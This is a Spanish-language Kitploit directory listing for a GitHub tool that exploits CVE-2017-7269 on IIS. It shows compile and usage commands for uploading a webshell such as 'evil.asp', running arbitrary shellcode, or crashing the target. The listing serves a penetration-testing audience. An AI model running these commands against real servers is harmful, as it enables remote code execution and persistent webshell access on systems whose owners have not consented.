Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2017-7269-tool — CVE-2017-7269 a webshell o cargador de shellcode | Kitploit
Herramientas/GitHubGitHub/zcgonvh/cve-2017-7269-tool
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubzcgonvh/cve-2017-7269-tool

cve-2017-7269-tool

CVE-2017-7269 a webshell o cargador de shellcode

Ver Repositorio
8828hace 9 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de webshell y shellcode para cve-2017-7269

compilación

root@kitploit:~
csc cve-2017-7269.cs

uso

root@kitploit:~
CVE-2017-7269 <url> [parms]

Header:
-h <host>       especifica el host para la cabecera [If]
-p <port>       especifica el puerto para la cabecera [If]
-s <scheme>     especifica el esquema para la cabecera [If]
-l <length>     longitud de la ruta física

WebShell:
-w <webshell>   sube webshell al servidor
-wp <shellpath> ruta donde se guardará la webshell

ShellCode:
-c <shellcode>  ejecuta el shellcode

Misc:
-t      solo prueba vulnerabilidad
-e      sale del proceso al obtener shell o probar
-k      mata objetivo (equivalente a -e y -t)

ejemplo

root@kitploit:~
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin
Descargar herramienta